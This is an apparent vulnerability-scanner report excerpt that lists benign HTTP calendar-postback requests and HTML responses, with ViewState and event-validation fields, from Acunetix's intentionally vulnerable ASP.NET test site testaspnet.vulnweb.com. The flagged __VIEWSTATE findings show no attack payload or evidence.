Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8521&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAzAHXSdsIZGRkjwB%2BjnyhlgEcdqR%2B7H1UlrTV4UA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLe6MHnDgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA16DHwJKs6n9pFDW07DbPodkDBh%2F
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:35 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgAAzAHXSdsIZGRkjwB+jnyhlgEcdqR+7H1UlrTV4UA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLe6MHnDgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA16DHwJKs6n9pFDW07DbPodkDBh/" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:White" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8536&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBA%2Fn2gVdsIZGRk4qUTPhVPqScVPuD5v1YAdOvJYJs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKXvrrQAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA%2Fm420W3b2%2F%2Fy84xzhV5ZcZH5On8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:59 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBA/n2gVdsIZGRk4qUTPhVPqScVPuD5v1YAdOvJYJs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKXvrrQAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA/m420W3b2//y84xzhV5ZcZH5On8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:White" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
